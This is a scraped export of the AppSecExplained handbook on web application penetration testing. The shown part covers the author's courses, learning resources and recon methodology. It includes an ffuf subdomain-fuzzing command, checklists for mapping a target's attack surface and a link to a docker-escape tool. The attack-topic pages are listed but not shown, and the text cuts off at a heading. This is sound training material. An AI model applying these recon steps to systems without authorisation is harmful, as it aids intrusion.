# Table of Contents - [Index < START HERE | AppSecExplained](#index-start-here-appsecexplained) - [My courses | AppSecExplained](#my-courses-appsecexplained) - [How to get started from zero | AppSecExplained](#how-to-get-started-from-zero-appsecexplained) - [Resource of the week | AppSecExplained](#resource-of-the-week-appsecexplained) - [Live Stream Content | AppSecExplained](#live-stream-content-appsecexplained) - [Subdomains | AppSecExplained](#subdomains-appsecexplained) - [Endpoints | AppSecExplained](#endpoints-appsecexplained) - [Content discovery / recon | AppSecExplained](#content-discovery-recon-appsecexplained) - [Parameters | AppSecExplained](#parameters-appsecexplained) - [Methodology | AppSecExplained](#methodology-appsecexplained) - [JavaScript injection (XSS) | AppSecExplained](#javascript-injection-xss-appsecexplained) - [SQL injection overview | AppSecExplained](#sql-injection-overview-appsecexplained) - [NoSQL injection | AppSecExplained](#nosql-injection-appsecexplained) - [XSS Methodology | AppSecExplained](#xss-methodology-appsecexplained) - [Blind SQLi | AppSecExplained](#blind-sqli-appsecexplained) - [File Inclusion | AppSecExplained](#file-inclusion-appsecexplained) - [Second-order SQLi | AppSecExplained](#second-order-sqli-appsecexplained) - [Spidering | AppSecExplained](#spidering-appsecexplained) - [Server-side template injection | AppSecExplained](#server-side-template-injection-appsecexplained) - [Directory traversal | AppSecExplained](#directory-traversal-appsecexplained) - [Blind XXE | AppSecExplained](#blind-xxe-appsecexplained) - [Client-side template injection | AppSecExplained](#client-side-template-injection-appsecexplained) - [Local file inclusion | AppSecExplained](#local-file-inclusion-appsecexplained) - [Template injection | AppSecExplained](#template-injection-appsecexplained) - [Detection | AppSecExplained](#detection-appsecexplained) - [Java | AppSecExplained](#java-appsecexplained) - [Command injection | AppSecExplained](#command-injection-appsecexplained) - [Authentication | AppSecExplained](#authentication-appsecexplained) - [Insecure file upload | AppSecExplained](#insecure-file-upload-appsecexplained) - [PHP | AppSecExplained](#php-appsecexplained) - [Server-side request forgery (SSRF) | AppSecExplained](#server-side-request-forgery-ssrf-appsecexplained) - [Cross-Site Request Forgery (CSRF) | AppSecExplained](#cross-site-request-forgery-csrf-appsecexplained) - [Open redirect | AppSecExplained](#open-redirect-appsecexplained) - [Insecure deserialization | AppSecExplained](#insecure-deserialization-appsecexplained) - [.NET | AppSecExplained](#-net-appsecexplained) - [Authentication lab setup & writeups | AppSecExplained](#authentication-lab-setup-writeups-appsecexplained) - [Python | AppSecExplained](#python-appsecexplained) - [XXE (XML external entity) injection | AppSecExplained](#xxe-xml-external-entity-injection-appsecexplained) - [Attacking password-based authentication | AppSecExplained](#attacking-password-based-authentication-appsecexplained) - [Attacking MFA | AppSecExplained](#attacking-mfa-appsecexplained) - [Vulnerable components | AppSecExplained](#vulnerable-components-appsecexplained) - [Clickjacking | AppSecExplained](#clickjacking-appsecexplained) - [Race conditions | AppSecExplained](#race-conditions-appsecexplained) - [Limit overrun | AppSecExplained](#limit-overrun-appsecexplained) - [Prototype pollution | AppSecExplained](#prototype-pollution-appsecexplained) - [Rate limiting | AppSecExplained](#rate-limiting-appsecexplained) - [Client-side prototype pollution | AppSecExplained](#client-side-prototype-pollution-appsecexplained) - [API: BOLA | AppSecExplained](#api-bola-appsecexplained) - [API: Broken authentication | AppSecExplained](#api-broken-authentication-appsecexplained) - [PHP scripts | AppSecExplained](#php-scripts-appsecexplained) - [BOPLA | AppSecExplained](#bopla-appsecexplained) - [RCE Function Check | AppSecExplained](#rce-function-check-appsecexplained) - [API: BFLA | AppSecExplained](#api-bfla-appsecexplained) - [WAF Bypasses | AppSecExplained](#waf-bypasses-appsecexplained) - [SQLi lab setup & writeups | AppSecExplained](#sqli-lab-setup-writeups-appsecexplained) - [Wordlists | AppSecExplained](#wordlists-appsecexplained) - [SQLi | AppSecExplained](#sqli-appsecexplained) - [APIs | AppSecExplained](#apis-appsecexplained) - [Sinks | AppSecExplained](#sinks-appsecexplained) - [Wordpress | AppSecExplained](#wordpress-appsecexplained) - [Single characters | AppSecExplained](#single-characters-appsecexplained) - [Docker-compose.yml files | AppSecExplained](#docker-compose-yml-files-appsecexplained) - [SQLi testing labs | AppSecExplained](#sqli-testing-labs-appsecexplained) - [Getting started | AppSecExplained](#getting-started-appsecexplained) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) - [Unknown](#unknown) --- # Index < START HERE | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/index-less-than-start-here.md) . ![Page cover](https://appsecexplained.gitbook.io/appsecexplained/~gitbook/image?url=https%3A%2F%2F86304134-files.gitbook.io%2F%7E%2Ffiles%2Fv0%2Fb%2Fgitbook-x-prod.appspot.com%2Fo%2Fspaces%252F7lI1MQhaUuVEjnryWVD9%252Fuploads%252Fm9OaaOHbIjYaGrPAeCou%252Fbackdrop.png%3Falt%3Dmedia%26token%3D169ff04c-e338-4249-8ee7-b96df4fde270&width=1248&dpr=3&quality=100&sign=be7ed479&sv=2) [](https://appsecexplained.gitbook.io/appsecexplained#welcome) Welcome --------------------------------------------------------------------------- This site is still a work in progress! There will be gaps and there's of course a lot more to come so make sure to check back in soon! > My goal is to provide a somewhat living and up-to-date handbook for Web Application Hacking. In particular the checklists are designed not just to give you things to look for, but also spark ideas, and creative ways to find vulnerabilities. This is a curated repository of my notes and experience over many years of testing web applications. I've stripped out the sensitive information and made it more accessible for those who are learning about web application security. I hope you find it useful in your journey. Throughout this site, I try to promote ideas over specific payloads to help you solve problems and find security weaknesses that other testers or scanners may have missed. Please feel free to connect with me! You can find me on LinkedIn, or Twitch. [![Logo](https://appsecexplained.gitbook.io/appsecexplained/~gitbook/image?url=https%3A%2F%2Fstatic.licdn.com%2Faero-v1%2Fsc%2Fh%2Fal2o9zrvru7aqj8e1x2rzsrca&width=20&dpr=3&quality=100&sign=24fd499f&sv=2)Alex Olsen - Intigriti | LinkedInLinkedin](https://www.linkedin.com/in/alex-olsen-47119322/) Please feel free to connect and message me if you have questions or feedback. [![Logo](https://appsecexplained.gitbook.io/appsecexplained/~gitbook/image?url=https%3A%2F%2Fabs.twimg.com%2Ffavicons%2Ftwitter.3.ico&width=20&dpr=3&quality=100&sign=1dab252a&sv=2)Alex Olsen (@appSecExp) on XX](https://twitter.com/appSecExp) In a moment of weakness I signed up to Twitter. [![Logo](https://appsecexplained.gitbook.io/appsecexplained/~gitbook/image?url=https%3A%2F%2Fassets.twitch.tv%2Fassets%2Ffavicon-32-e29e246c157142c94346.png&width=20&dpr=3&quality=100&sign=37c649f7&sv=2)AppSecExplained - TwitchTwitch](https://www.twitch.tv/appsecexplained) I stream here from time to time :) [NextMy courses](https://appsecexplained.gitbook.io/appsecexplained/index-less-than-start-here/my-courses) Last updated 1 year ago Was this helpful? Was this helpful? --- # My courses | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/index-less-than-start-here/my-courses.md) . There are the courses that I've published. [![Logo](https://appsecexplained.gitbook.io/appsecexplained/~gitbook/image?url=https%3A%2F%2Fmedia.tcm-sec.com%2Fuploads%2F2026%2F02%2Fcropped-TCM-Sec-Primary-Logo-1-300x300.png&width=20&dpr=3&quality=100&sign=5fee96db&sv=2)Academy - TCM SecurityTCM Security - Cyber Security](https://academy.tcm-sec.com/p/advanced-web-hacking) [https://academy.tcm-sec.com/p/hacking-apisacademy.tcm-sec.com](https://academy.tcm-sec.com/p/hacking-apis) Beginner API hacking course [![Logo](https://appsecexplained.gitbook.io/appsecexplained/~gitbook/image?url=https%3A%2F%2Fmedia.tcm-sec.com%2Fuploads%2F2026%2F02%2Fcropped-TCM-Sec-Primary-Logo-1-300x300.png&width=20&dpr=3&quality=100&sign=5fee96db&sv=2)Practical Bug Bounty - TCM SecurityTCM Security - Cyber Security](https://academy.tcm-sec.com/p/practical-bug-bounty) Beginner web hacking course [![Logo](https://appsecexplained.gitbook.io/appsecexplained/~gitbook/image?url=https%3A%2F%2Fmedia.tcm-sec.com%2Fuploads%2F2026%2F02%2Fcropped-TCM-Sec-Primary-Logo-1-300x300.png&width=20&dpr=3&quality=100&sign=5fee96db&sv=2)Practical Web Hacking - TCM SecurityTCM Security - Cyber Security](https://academy.tcm-sec.com/p/practical-web-hacking) Intermediate web hacking course [PreviousIndex < START HERE](https://appsecexplained.gitbook.io/appsecexplained) [NextHow to get started from zero](https://appsecexplained.gitbook.io/appsecexplained/index-less-than-start-here/how-to-get-started-from-zero) Last updated 1 year ago Was this helpful? Was this helpful? --- # How to get started from zero | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/index-less-than-start-here/how-to-get-started-from-zero.md) . How to get started with Web App Pentesting in 2023. [](https://appsecexplained.gitbook.io/appsecexplained/index-less-than-start-here/how-to-get-started-from-zero#beginner-resources-i-recommend) Beginner resources I recommend --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [![Logo](https://appsecexplained.gitbook.io/appsecexplained/~gitbook/image?url=https%3A%2F%2Fportswigger.net%2Fcontent%2Fimages%2Flogos%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=cbff289f&sv=2)Dashboard | Web Security Academy - PortSwiggerWebSecAcademy](https://portswigger.net/web-security/dashboard) Portswigger's Web Security Academy [![Logo](https://appsecexplained.gitbook.io/appsecexplained/~gitbook/image?url=https%3A%2F%2Fuploads.teachablecdn.com%2Fattachments%2F6ZDiZVTTsCCe00yRhXnP_Android.png&width=20&dpr=3&quality=100&sign=c1109d7b&sv=2)Rana Khalil's Academyranakhalil.teachable.com](https://ranakhalil.teachable.com/courses) Rana Khalil's Web Application Security Course [![Logo](https://appsecexplained.gitbook.io/appsecexplained/~gitbook/image?url=https%3A%2F%2Ftryhackme.com%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=2f347f9c&sv=2)TryHackMe | Cyber Security TrainingTryHackMe](https://tryhackme.com/dashboard) TryHackMe [![Logo](https://appsecexplained.gitbook.io/appsecexplained/~gitbook/image?url=https%3A%2F%2Fwww.theodinproject.com%2Fapple-touch-icon.png&width=20&dpr=3&quality=100&sign=d83fb125&sv=2)Your Career in Web Development Starts Here | The Odin Projectwww.theodinproject.com](https://www.theodinproject.com/) Learn JavaScript [](https://appsecexplained.gitbook.io/appsecexplained/index-less-than-start-here/how-to-get-started-from-zero#intermediate-resources-i-recommend) Intermediate resources I recommend ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- [https://affiliate.hackthebox.com/ada6iqaz8k1faffiliate.hackthebox.com](https://affiliate.hackthebox.com/ada6iqaz8k1f) HackTheBox (affiliate link) [PreviousMy courses](https://appsecexplained.gitbook.io/appsecexplained/index-less-than-start-here/my-courses) [NextLive Stream Content](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content) Last updated 1 year ago Was this helpful? * [Beginner resources I recommend](https://appsecexplained.gitbook.io/appsecexplained/index-less-than-start-here/how-to-get-started-from-zero#beginner-resources-i-recommend) * [Intermediate resources I recommend](https://appsecexplained.gitbook.io/appsecexplained/index-less-than-start-here/how-to-get-started-from-zero#intermediate-resources-i-recommend) Was this helpful? --- # Resource of the week | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content/resource-of-the-week.md) . [](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content/resource-of-the-week#what-is-resource-of-the-week) What is resource of the week? --------------------------------------------------------------------------------------------------------------------------------------------------------------- Every week we look to find an underrated resource and share it with the community. If you have something you want to share, drop it into the [**TCM Discord #tuesday-stream-questions**](https://discord.gg/tcm) . [](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content/resource-of-the-week#feb-27th-2024) Feb 27th 2024 -------------------------------------------------------------------------------------------------------------------------------- When you find yourself inside a docker container and really want to escape. * Deepce [https://github.com/stealthcopter/deepce](https://github.com/stealthcopter/deepce) [](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content/resource-of-the-week#feb-20th-2024) Feb 20th 2024 -------------------------------------------------------------------------------------------------------------------------------- This list refreshes every 5mins! So you can be the first to a target, increase your chances of success and reduce duplicates. * Bug Bounty Radar [https://bbradar.io/](https://bbradar.io/) [](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content/resource-of-the-week#feb-13th-2024) Feb 13th 2024 -------------------------------------------------------------------------------------------------------------------------------- * My box recommendations thanks to icanhaspii (Discord) [https://bit.ly/AlexFaves](https://bit.ly/AlexFaves) * rs0n\_live [https://www.youtube.com/@rs0n\_live](https://www.youtube.com/@rs0n_live) [](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content/resource-of-the-week#feb-6nd-2024) Feb 6nd 2024 ------------------------------------------------------------------------------------------------------------------------------ ### [](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content/resource-of-the-week#critical-thinking-bug-bounty-podcast) Critical Thinking - Bug Bounty Podcast. A great podcast with entertaining and knowledgeable hosts and guests. New episodes weekly! * Bug bounty * AppSec * Video podcast [![Logo](https://appsecexplained.gitbook.io/appsecexplained/~gitbook/image?url=https%3A%2F%2Fwww.youtube.com%2Fs%2Fdesktop%2F43b59ebb%2Fimg%2Ffavicon_144x144.png&width=20&dpr=3&quality=100&sign=856460ed&sv=2)Critical Thinking - Bug Bounty PodcastYouTube](https://www.youtube.com/@criticalthinkingpodcast) [](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content/resource-of-the-week#jan-30th-2024) Jan 30th 2024 -------------------------------------------------------------------------------------------------------------------------------- ### [](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content/resource-of-the-week#rana-khalil-youtube-and-academy) Rana Khalil YouTube & Academy If you want to learn about web app pentesting then this is a golden resource. * AppSec [![Logo](https://appsecexplained.gitbook.io/appsecexplained/~gitbook/image?url=https%3A%2F%2Fwww.youtube.com%2Fs%2Fdesktop%2F43517217%2Fimg%2Ffavicon_144x144.png&width=20&dpr=3&quality=100&sign=c16d2ff5&sv=2)Rana KhalilYouTube](https://www.youtube.com/@RanaKhalil101) [![Logo](https://appsecexplained.gitbook.io/appsecexplained/~gitbook/image?url=https%3A%2F%2Fstatic-media.hotmart.com%2FqURyFopm8bxYcNpoJIpKIMP34AA%3D%2F32x32%2Fhttps%3A%2F%2Fuploads.teachablecdn.com%2Fattachments%2F6ZDiZVTTsCCe00yRhXnP_Android.png&width=20&dpr=3&quality=100&sign=f53d91c2&sv=2)Web Security Academy Series Courseacademy.ranakhalil.com](https://academy.ranakhalil.com/p/web-security-academy-video-series) [](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content/resource-of-the-week#jan-23rd-2024) Jan 23rd 2024 -------------------------------------------------------------------------------------------------------------------------------- #### [](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content/resource-of-the-week#mary-ellen-kennels-blog-on-everything-dfir) Mary Ellen Kennel's blog on everything DFIR! * Building a lab * DFIR * Blue team * Leadership * A lot more... [![Logo](https://appsecexplained.gitbook.io/appsecexplained/~gitbook/image?url=https%3A%2F%2Fdfirlinks.blogspot.com%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=240ee962&sv=2)DFIRLinksdfirlinks.blogspot.com](https://dfirlinks.blogspot.com/) [PreviousLive Stream Content](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content) [NextMethodology](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology) Last updated 2 years ago Was this helpful? * [What is resource of the week?](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content/resource-of-the-week#what-is-resource-of-the-week) * [Feb 27th 2024](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content/resource-of-the-week#feb-27th-2024) * [Feb 20th 2024](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content/resource-of-the-week#feb-20th-2024) * [Feb 13th 2024](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content/resource-of-the-week#feb-13th-2024) * [Feb 6nd 2024](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content/resource-of-the-week#feb-6nd-2024) * [Critical Thinking - Bug Bounty Podcast.](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content/resource-of-the-week#critical-thinking-bug-bounty-podcast) * [Jan 30th 2024](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content/resource-of-the-week#jan-30th-2024) * [Rana Khalil YouTube & Academy](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content/resource-of-the-week#rana-khalil-youtube-and-academy) * [Jan 23rd 2024](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content/resource-of-the-week#jan-23rd-2024) Was this helpful? --- # Live Stream Content | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content.md) . [](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content#live-streams) Live Streams --------------------------------------------------------------------------------------------------------- Every Wednesday at 12:00 ET on The Cyber Mentor YouTube Channel. [![Logo](https://appsecexplained.gitbook.io/appsecexplained/~gitbook/image?url=https%3A%2F%2Fwww.youtube.com%2Fs%2Fdesktop%2F61baa440%2Fimg%2Ffavicon_144x144.png&width=20&dpr=3&quality=100&sign=63417f02&sv=2)The Cyber MentorYouTube](https://www.youtube.com/@TCMSecurityAcademy/streams) [](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content#faq-and-links) FAQ & Links --------------------------------------------------------------------------------------------------------- ### [](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content#how-do-i-start-pentesting) How do I start Pentesting? * Ethical Hacking in 15 Hours (FREE) [https://www.youtube.com/watch?v=3FNYvj2U0HM](https://www.youtube.com/watch?v=3FNYvj2U0HM) * TCM courses [https://academy.tcm-sec.com/](https://academy.tcm-sec.com/) * Portswigger Web Security Academy (FREE) [https://portswigger.net/web-security/dashboard](https://portswigger.net/web-security/dashboard) * TryHackMe learning paths [https://tryhackme.com/](https://tryhackme.com/dashboard) ### [](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content#how-do-i-become-a-soc-analyst) How do I become a SOC Analyst? * Watch this video guide [https://www.youtube.com/watch?v=OXzDbxphBuA](https://www.youtube.com/watch?v=OXzDbxphBuA) ### [](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content#will-ai-replace-cybersecurity-jobs) Will AI replace cybersecurity jobs? * Nope ### [](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content#how-do-i-join-the-tcm-discord) How do I join the TCM discord? * Go to [https://discord.gg/tcm](https://discord.gg/tcm) [PreviousHow to get started from zero](https://appsecexplained.gitbook.io/appsecexplained/index-less-than-start-here/how-to-get-started-from-zero) [NextResource of the week](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content/resource-of-the-week) Last updated 1 year ago Was this helpful? * [Live Streams](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content#live-streams) * [FAQ & Links](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content#faq-and-links) * [How do I start Pentesting?](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content#how-do-i-start-pentesting) * [How do I become a SOC Analyst?](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content#how-do-i-become-a-soc-analyst) * [Will AI replace cybersecurity jobs?](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content#will-ai-replace-cybersecurity-jobs) * [How do I join the TCM discord?](https://appsecexplained.gitbook.io/appsecexplained/live-stream-content#how-do-i-join-the-tcm-discord) Was this helpful? --- # Subdomains | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/subdomains.md) . [](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/subdomains#what-is-it) What is it? ------------------------------------------------------------------------------------------------------------------------------------- Subdomain discovery is the process of finding what subdomains exist given a domain name. For example, the domain `tcm-sec.com` might have the subdomains `dev.tcm-sec.com` and `blog.tcm-sec.com`. ### [](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/subdomains#wordlists) Wordlists Assetnote [https://wordlists-cdn.assetnote.io/data/manual/best-dns-wordlist.txt](https://wordlists-cdn.assetnote.io/data/manual/best-dns-wordlist.txt) Seclists [/Seclists/Discovery/DNS/](https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS) [](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/subdomains#passive-discovery) Passive discovery -------------------------------------------------------------------------------------------------------------------------------------------------- * Sublistr * Google * [https://crt.sh/](https://crt.sh/) [](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/subdomains#active-discovery) Active discovery ------------------------------------------------------------------------------------------------------------------------------------------------ * Sublistr * DNSRecon * Amass * Ffuf [PreviousContent discovery / recon](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon) [NextEndpoints](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/endpoints) Last updated 2 years ago Was this helpful? * [What is it?](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/subdomains#what-is-it) * [Wordlists](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/subdomains#wordlists) * [Passive discovery](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/subdomains#passive-discovery) * [Active discovery](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/subdomains#active-discovery) Was this helpful? Copy ffuf -u -w /path/to/wordlist.txt -H "Host: FUZZ.target.com" -fs --- # Endpoints | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/endpoints.md) . [](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/endpoints#api-driven-applications) API-driven applications ------------------------------------------------------------------------------------------------------------------------------------------------------------- [PreviousSubdomains](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/subdomains) [NextParameters](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/parameters) Last updated 3 years ago Was this helpful? Was this helpful? --- # Content discovery / recon | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon.md) . Content discovery is a significant part of web application penetration testing or bug bounty hunting. This process involves identifying and mapping out components, endpoints, directories, functionality, and subdomains of a target web application. Things we want to look at are: * Subdomains * Technology stack * Directories and endpoints * Parameters * Functionality * APIs * JavaScript / fontend analysis * Other open ports / services [](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon#checklist) Checklist ----------------------------------------------------------------------------------------------------------------------- **Web Server** * What is the server running? * Operating system: Linux or Windows? * Web server: Apache or Nginx? Etc * Can we identify the version of the Web Server? * Are there any subdomains? **Common files** * robots.txt * sitemap.xml * .htaccess * security.txt * manifest.json * browserconfig.xml * etc **Frontend checks** * Inspect the page source for frontend scripts & information * Is there any sensitive information in the frontend? * Are there links and other things in the frontend that aren't used? **Entry Points** * What endpoints exist * What HTTP methods are used * What parameters are used * Fuzz for hidden endpoints, files, parameters, methods, etc **Map Application Architecture** * Step through the entire application [PreviousMethodology](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology) [NextSubdomains](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/subdomains) Last updated 2 years ago Was this helpful? Was this helpful? --- # Parameters | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/parameters.md) . [PreviousEndpoints](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/endpoints) [NextSpidering](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/content-discovery-recon/spidering) Last updated 3 years ago Was this helpful? Was this helpful? --- # Methodology | AppSecExplained For the complete documentation index, see [llms.txt](https://appsecexplained.gitbook.io/appsecexplained/llms.txt) . This page is also available as [Markdown](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology.md) . Recon, enumeration, attack surface discovery...whatever you want to call it is not really a single step or phase. We continue to enumerate throughout every step of testing an application. Even during exploitation, especially when our exploits fail, we continue to enumerate and discover more about our target application. So with that, one could argue that this is the most critical skill to develop. At the start of our engagement, we need to orient ourselves and so that we understand the target enough to uncover the full attack surface (or as much of it as possible). [](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#things-we-want-to-find-out) Things we want to find out --------------------------------------------------------------------------------------------------------------------------------------------- ### [](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#part-1-apex-domains-subdomains-applications-and-technologies) Part 1: Apex domains, subdomains, applications and technologies Most modern web applications are a combination of technologies and if you're working on a wide scope BugBounty programme or a pentest for an organisation with many applications then you'll need to start by discovering the apex domains, subdomains as there may by many applications in-scope. #### [](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#what-domains-and-subdomains-are-in-scope) What domains & subdomains are in scope? * Root / apex domains * Associated business units/brands * Development/staging environments * Legacy systems * Cloud resources (AWS, Azure, GCP instances) * Internal systems accessible externally #### [](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#what-technologies-exist) What technologies exist * Web servers and versions * Programming languages/frameworks * CMS platforms * Cloud services * Authentication systems * Third-party integrations * APIs and microservices * Database systems * Content delivery networks * Security controls (WAF, rate limiting) ### [](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#part-2-application-attack-surface) Part 2: Application attack surface After we've identified targets, we need to understand the attack surface of individual targets. This isn't a single step, it can be iterative and exploiting a target can lead to the discovery of more endpoints, technologies or applications to attack (e.g. when we discover SSRF and gain access to internal systems). #### [](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#what-endpoints-exist) What endpoints exist * API endpoints * Admin interfaces * Legacy/deprecated endpoints * Mobile app endpoints * Authentication endpoints * File upload/download functionality * Payment processing endpoints * User profile/management areas * Integration endpoints * Webhook endpoints #### [](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#what-functionality-exists) What functionality exists * User roles and permissions * Authentication mechanisms * Session management * Data processing flows * File handling * Input/output points * Business logic flows * Error handling * Integration points * Background processes [](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#checklist) Checklist ----------------------------------------------------------------------------------------------------------- ### [](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#part-1-initial-discovery) Part 1: Initial Discovery #### [](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#domain-reconnaissance) Domain Reconnaissance * Identify root domains * Subdomain enumeration * DNS records analysis * Virtual hosts discovery * Cloud asset discovery * Historical DNS data #### [](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#technology-stack-identification) Technology Stack Identification * Server fingerprinting * Framework detection * Third-party components * Cloud services * Security mechanisms * SSL/TLS configuration #### [](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#infrastructure-mapping) Infrastructure Mapping * IP ranges * Network topology * Load balancers * CDN usage * Cloud resources * Internal systems exposure ### [](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#part-2-application-analysis) Part 2: Application Analysis #### [](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#endpoint-discovery) Endpoint Discovery * Directory enumeration * Parameter discovery * API endpoint mapping * Hidden endpoints in JS * Backup files * Development endpoints #### [](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#functionality-mapping) Functionality Mapping * User roles identification * Authentication flows * Session handling * Business logic flows * File operations * Data processing #### [](https://appsecexplained.gitbook.io/appsecexplained/discovery-recon/methodology#content-analysis) Content Analysis * JavaScript files * Source code leaks * API documentation * Error messages * Comments * Hidden parameters #### 